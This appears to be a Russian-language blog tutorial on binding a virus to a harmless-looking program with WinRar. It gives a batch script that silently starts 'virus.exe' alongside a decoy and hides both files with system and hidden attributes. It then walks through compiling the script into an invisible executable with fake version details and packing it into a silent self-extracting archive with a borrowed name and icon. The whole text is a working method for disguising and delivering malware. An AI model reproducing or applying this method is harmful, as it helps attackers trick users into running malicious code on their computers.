Предыдущая публикация
В этой статье я покажу как склеивают вирусы при помощи архиватора WinRar.
Для начала напишем батинок( текстовый файл содержащий в себе команды командной строки Windows с расширением .bat),который будет запускать оба файла,тем самым создавая вид что устанавливается простая программа и в то же время будет работать вирус.
@echo off
start virus.exe >nul
start soft.exe >nul
attrib +s +h +r +a %Systemroot%\virus.exe >nul
attrib +s +h +r +a %Systemroot%\soft.exe >nul
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul
exit
@echo off - скрывает тело батинка
start virus.exe - запускает наш вирус с именем virus.exe
start soft.exe - запускает программу для отвода глаза с именем soft.exe
attrib +s +h +r +a %Systemroot%\virus.exe >nul - прячет от глаз при просмотре в обычной оболочке стандартного проводника(explorer) папки Windows,наш вирус с именем virus.exe
attrib +s +h +r +a %Systemroot%\soft.exe >nul - выполняет тоже самое,но для программы с именем soft.exe
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul - тут вы укажите собственно имя самого батинка в котором и будет это всё содержаться.
exit - завершает выполнение батинка и выходит.
Компилируем батинок в exe с помощбю программы Bat to exe converter
Допустим у нас есть 2 программы:
1) virus.exe (У меня в virus.exe код батника для смены кнопок мыши) - "У вас может быть все что угодно."
2) soft.exe (А здесь в soft.exe банер для windows) - "У вас может быть все что угодно."
3) сам батинок
Запускам Bat to exe converter и сразу на первой вкладке выбираем опцию на Invisible application
Далее переходим на вкладку Versioninformations и указываем все данные.
Добавляем файлы в архив WinRar:
Указываем имя программы под которую будет маскироваться наш вирус( и под которым будет создан сам архив)
Ставим галки на "Создать SFX-Архив" и переходим на вкладку Дополнительно
Указываем путь для распаковки и имя скомпилированного батинка (с расширением) который будет запускать вирус и программу одновременно (я назвал его batinok.exe),после переходим на вкладку "Обновление"
Указываем в опциях "Режима обновления" - "Извлечь и обновить" и в опциях "Режим перезаписи" - "Перезаписывать все файлы без запросов"
После переходим на вкладку "Режимы" и в опциях указываем "Скрыть всё"
И переходим на вкладку "Текст и графика" для того чтоб присвоить к архиву иконку.
В итоге мы получаем исполняемый файл,который при запуске запустит вирус и программу.
Следующая публикация
Комментарии 1